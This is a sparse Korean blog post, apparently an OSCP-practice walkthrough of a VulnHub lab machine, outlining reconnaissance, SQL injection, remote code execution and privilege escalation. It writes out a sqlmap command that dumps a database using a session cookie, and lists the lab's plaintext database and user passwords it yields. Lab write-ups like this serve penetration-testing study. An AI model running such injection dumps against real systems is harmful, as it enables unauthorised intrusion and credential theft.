1. Reconnaissance





: HTTP Parameter Pollution(HPP)

: hisotry.php는 빈 페이지

- 혹시 모르니 파라미터 fuzzing

: user
- 테스트

확인 완료!
2. Exploitation
- admin 조회

- github 확인

- 소스 확인

: SQL 계정 정보 확인
root/ sqluserrootpassw0r4

: system 함수 파라미터 확인
- RCE 시도

: 일반 계정으로 시도 시 실행 불가
> admin 계정 비번을 알아야 한다.
- SQL injection
# sqlmap --url 'http://192.168.10.114/history.php?user=admin' --cookie="PHPSESSID=8nsdb4ue0bi7g7hjaju33tjfvd" --dump --batch

admin / myadmin#p4szw0r4d
john / Sup3r$S3cr3t$PasSW0RD
- 다시 RCE 시도

성공!
- 쉘


: 침투 성공!
3. Privilege Escalation
- John?

john!
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| [+] Torment (0) | 2023.01.22 |
|---|---|
| [+] Election (0) | 2023.01.22 |
| [+] VENOM (0) | 2023.01.21 |
| [+] DigitalWorld.local : FALL (SSH id_rsa) (0) | 2023.01.21 |
| [+] WinterMute (Pivoting - 중요)* (0) | 2023.01.21 |